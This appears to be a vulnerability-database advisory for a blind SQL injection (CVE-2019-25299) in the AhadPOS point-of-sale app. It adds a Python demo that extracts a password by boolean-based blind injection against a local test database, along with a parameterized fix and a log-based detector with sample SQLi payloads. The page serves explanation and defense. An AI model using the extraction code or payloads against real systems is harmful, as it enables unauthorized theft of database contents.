
CVE-2019-25299

Severity: High · Public PoC available

Published: 06 February 2026
Modified: 15 April 2026
KEV added: not listed
Patch: no entry
CVSS v4 score: 7.1 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X)
EPSS score: 0.0004 (percentile 14.1)
Risk priority: 14 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2019-25299 is a high-severity SQL Injection (CWE-89) vulnerability. Its CVSS base score is 7.1 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). Its EPSS score places it at percentile 14.1 by exploit likelihood (below the median), it is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced (Exploit-DB 47585), so a working exploit exists even though the observed exploitation probability is low.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and AC-6 (Least Privilege).

Deeper analysis

CVE-2019-25299 is a SQL injection vulnerability in RimbaLinux AhadPOS version 1.11. The issue affects the 'alamatCustomer' parameter: its value from POST requests reaches a database query without proper sanitization or parameterization, so an attacker can alter the structure of that query. Because the application does not echo query results or database errors in a way that directly reveals data, exploitation relies on blind techniques, time-based (injecting a delay and measuring response time) and boolean-based (injecting a condition and observing whether the response changes), to extract information or otherwise interact with the underlying database one yes/no answer at a time. The vulnerability carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N), the same value the v4 vector above yields, and maps to CWE-89.

The attack requires low privileges (PR:L) and can be conducted remotely over the network (AV:N) with low complexity (AC:L) and no user interaction (UI:N). An attacker holding any low-privileged account on the application can craft malicious POST requests to the vulnerable parameter, achieving high confidentiality impact through data extraction and low integrity impact via query alteration, without affecting availability. Note that the injected SQL runs with the privileges of the database account the application itself uses, not those of the web user submitting the request, which is why the least-privilege control below targets that account.
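The following Python example is added here and is not code from AhadPOS or from any of the advisories referenced on this page. It reproduces the mechanism just described end to end: a query that splices the alamatCustomer POST value into SQL text, a boolean-based blind probe against it that recovers a secret one character at a time with a binary search (about seven requests per character), and the parameterized form that the SI-10 mitigation named in the summary calls for, against which the same payload is inert. It runs against an in-memory SQLite database with an assumed schema (customer.alamat, user.password) and made-up rows. The time-based variant is not shown because SQLite has no SLEEP()-style delay function; it uses the same probes with a measured response delay as the yes/no oracle.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the POS database. Table and column names
    (customer.alamat, user.password) are assumptions for illustration, not
    AhadPOS's real schema; the seeded rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customer (id INTEGER PRIMARY KEY, nama TEXT, alamat TEXT)")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO customer (nama, alamat) VALUES (?, ?)",
                     [("Budi", "Jl. Merdeka 1"), ("Siti", "Jl. Sudirman 9")])
    conn.execute("INSERT INTO user (username, password) VALUES ('admin', 's3cret')")
    return conn


def vulnerable_lookup(conn, alamat_customer):
    """The CWE-89 pattern: the POST value is spliced into the SQL text, so a
    quote in the value ends the literal and the rest becomes SQL."""
    sql = "SELECT id, nama FROM customer WHERE alamat = '%s'" % alamat_customer
    return conn.execute(sql).fetchall()


def safe_lookup(conn, alamat_customer):
    """The SI-10 fix: bind the value as a parameter so it can only ever be data."""
    sql = "SELECT id, nama FROM customer WHERE alamat = ?"
    return conn.execute(sql, (alamat_customer,)).fetchall()


def boolean_oracle(conn, condition):
    """One blind probe: inject a condition behind a known-good address and see
    whether the known row is still returned. The trailing '-- ' comments out
    the closing quote of the original statement."""
    payload = "Jl. Merdeka 1' AND (%s) -- " % condition
    return len(vulnerable_lookup(conn, payload)) > 0


def extract_secret(conn, subquery, max_len=64):
    """Boolean-based blind extraction of a string-valued subquery, one
    character at a time, binary-searching the printable ASCII range."""
    recovered = ""
    for pos in range(1, max_len + 1):
        if not boolean_oracle(conn, "LENGTH((%s)) >= %d" % (subquery, pos)):
            break  # past the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "UNICODE(SUBSTR((%s), %d, 1)) > %d" % (subquery, pos, mid)
            if boolean_oracle(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


# Subquery for the secret the attacker wants (table/column names assumed, see make_db).
ADMIN_PW = "SELECT password FROM user WHERE username = 'admin'"


def demo():
    """Vulnerable vs parameterized lookup on the same tautology payload, plus a
    full blind extraction of the admin password through the vulnerable path."""
    conn = make_db()
    tautology = "x' OR '1'='1"
    return {
        "vulnerable_rows_for_tautology": len(vulnerable_lookup(conn, tautology)),
        "safe_rows_for_tautology": len(safe_lookup(conn, tautology)),
        "blind_extracted_password": extract_secret(conn, ADMIN_PW),
    }


if __name__ == "__main__":
    print(demo())
```

The tautology returns every customer row through vulnerable_lookup and none through safe_lookup, and extract_secret recovers the seeded password with no output from the application beyond "row present or not", which is exactly why blind SQLi is still a high confidentiality impact despite the silent response.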

Advisories and resources include the VulnCheck advisory at https://www.vulncheck.com/advisories/rimbalinux-ahadpos-alamatcustomer-sql-injection, the exploit script on Exploit-DB at https://www.exploit-db.com/exploits/47585, and the project repository on GitHub at https://github.com/rimbalinux/AhadPOS. These provide further details on the vulnerability; the page records no patch entry, so check the repository for a fixed release before relying on an upgrade as the remediation.


Vulnerability details

RimbaLinux AhadPOS 1.11 contains a SQL injection vulnerability in the 'alamatCustomer' parameter that allows attackers to manipulate database queries through crafted POST requests. Attackers can exploit time-based and boolean-based blind SQL injection techniques to extract information or potentially interact with the underlying database.

CWE(s)

CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

T1213.006 Databases (Collection)
Adversaries may leverage databases to mine valuable information.
Why these techniques?

SQL injection in web app parameter enables remote exploitation of public-facing application (T1190) and direct unauthorized access/exfiltration from backend database (T1213.006).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2019-25537 (shared CWE-89)
CVE-2019-25366 (shared CWE-89)
CVE-2019-25496 (shared CWE-89)
CVE-2026-1475 (shared CWE-89)
CVE-2026-26990 (shared CWE-89)
CVE-2026-44047 (shared CWE-89)
CVE-2025-12865 (shared CWE-89)
CVE-2024-11135 (shared CWE-89)
CVE-2019-25491 (shared CWE-89)
CVE-2024-13369 (shared CWE-89)

Affected Assets

RimbaLinux AhadPOS 1.11

Mitigating Controls (NIST 800-53 r5, AI-generated mapping)

prevent: SI-10 Information Input Validation
Directly requires validation and sanitization of all input parameters (such as alamatCustomer in POST requests) to block SQL injection payloads before they reach the database. For SQL specifically, the change that removes the bug class is parameterized (prepared) queries; allow-list validation of the address value is a second layer, not a substitute, since escaping alone is easy to get wrong.

prevent: AC-6 Least Privilege
Limits the privileges of the database account the application uses. Every injected query runs with that account's rights regardless of which low-privilege web user submitted it, so restricting the account to the SELECT/INSERT/UPDATE rights its own queries need, with no access to other schemas or administrative statements, bounds what a successful blind SQLi can read or modify.

detect
Enables monitoring of database query patterns and anomalies that would reveal time-based or boolean-based blind SQL injection attempts against the alamatCustomer field. Two signals are characteristic here: delay functions (SLEEP, BENCHMARK, pg_sleep, WAITFOR DELAY) in query text or a run of unusually slow responses from one client, and the high volume of near-identical requests with varying conditions that boolean-based extraction requires, since each probe yields only one bit.
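As an added example, not part of this page nor of any vendor tooling, the Python script below implements the detection the control above describes over constructed request-log lines. It extracts the alamatCustomer parameter from each request body, flags the payload signatures of the two blind styles (SLEEP/BENCHMARK/pg_sleep/WAITFOR DELAY for time-based probes; a quote or parenthesis that breaks the literal, followed by AND/OR and a comparison, for boolean-based ones), and adds two behavioural signals that survive obfuscation of the payload itself: repeated slow responses from one source, and a burst of distinct values to the same parameter from one source, which the many yes/no probes a blind extraction needs will produce. The log format (timestamp, source IP, method, path, status, response milliseconds, URL-encoded body), the /customer route, the IP addresses and the thresholds are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

PARAM = "alamatCustomer"

# Payload signatures for the two blind-SQLi styles named in the advisory.
TIME_BASED = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# A quote or paren that closes the original literal, then AND/OR, then a comparison.
BOOLEAN_BASED = re.compile(r"['\")]\s*\b(and|or)\b\s+.+?(=|<|>|\blike\b)", re.I)
# Comment sequences used to discard the tail of the original statement. '#' is only
# matched at the end of the value because a bare '#' is common in street addresses.
COMMENT_TAIL = re.compile(r"(--\s|--$|/\*|#\s*$)")

# Constructed sample log (assumed format: ts src method path status resp_ms body).
# The /customer route and the addresses are placeholders, not AhadPOS's real routes.
SAMPLE_LOG = [
    "2026-02-06T10:00:01Z 198.51.100.7 POST /customer 200 42 alamatCustomer=Jl.+Merdeka+1&namaCustomer=Budi",
    "2026-02-06T10:00:02Z 203.0.113.5 POST /customer 200 5012 alamatCustomer=x%27+AND+SLEEP%285%29--+",
    "2026-02-06T10:00:08Z 203.0.113.5 POST /customer 200 5009 alamatCustomer=x%27+AND+SLEEP%285%29+AND+%27a%27%3D%27a",
    "2026-02-06T10:00:14Z 203.0.113.5 POST /customer 200 40 alamatCustomer=x%27+AND+1%3D1--+",
    "2026-02-06T10:00:15Z 203.0.113.5 POST /customer 200 39 alamatCustomer=x%27+AND+1%3D2--+",
    "2026-02-06T10:00:16Z 203.0.113.5 POST /customer 200 41 alamatCustomer=x%27+AND+LENGTH%28database%28%29%29%3E5--+",
    "2026-02-06T10:00:17Z 203.0.113.5 POST /customer 200 41 alamatCustomer=x%27+AND+LENGTH%28database%28%29%29%3E8--+",
    "2026-02-06T10:00:18Z 203.0.113.5 POST /customer 200 40 alamatCustomer=x%27+AND+LENGTH%28database%28%29%29%3E6--+",
]


def parse_line(line):
    """Split one log line and pull out the decoded alamatCustomer value."""
    ts, src, method, path, status, ms, body = line.split(" ", 6)
    value = parse_qs(body, keep_blank_values=True).get(PARAM, [""])[0]
    return {"ts": ts, "src": src, "method": method, "path": path,
            "status": int(status), "ms": int(ms), "value": value}


def classify(value):
    """Signature tags for a single parameter value (empty list if it looks benign)."""
    tags = []
    if TIME_BASED.search(value):
        tags.append("time-based")
    if BOOLEAN_BASED.search(value):
        tags.append("boolean-based")
    if COMMENT_TAIL.search(value):
        tags.append("comment-terminator")
    return tags


def detect(lines, slow_ms=3000, min_slow=2, burst=5):
    """Per-request signature hits plus two behavioural signals per source:
    repeated slow responses (time-based) and a burst of distinct parameter
    values (the one-bit-per-request probing of boolean-based extraction).
    Returns (source, timestamp, kind, detail) tuples."""
    findings = []
    slow = defaultdict(int)
    distinct = defaultdict(set)
    for line in lines:
        r = parse_line(line)
        tags = classify(r["value"])
        if tags:
            findings.append((r["src"], r["ts"], ",".join(tags), r["value"]))
        if r["ms"] >= slow_ms:
            slow[r["src"]] += 1
        distinct[r["src"]].add(r["value"])
    for src, n in slow.items():
        if n >= min_slow:
            findings.append((src, "*", "behaviour:repeated-slow-responses", str(n)))
    for src, values in distinct.items():
        if len(values) >= burst:
            findings.append((src, "*", "behaviour:probe-burst", str(len(values))))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

Thresholds should be tuned to the deployment: slow_ms sits above the endpoint's normal latency, and burst above the number of distinct addresses one legitimate user enters in the window being analysed. The behavioural checks are the ones worth keeping even if a WAF already covers the signatures, since an attacker who encodes or splits the payload still has to make many requests or wait on many delays.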
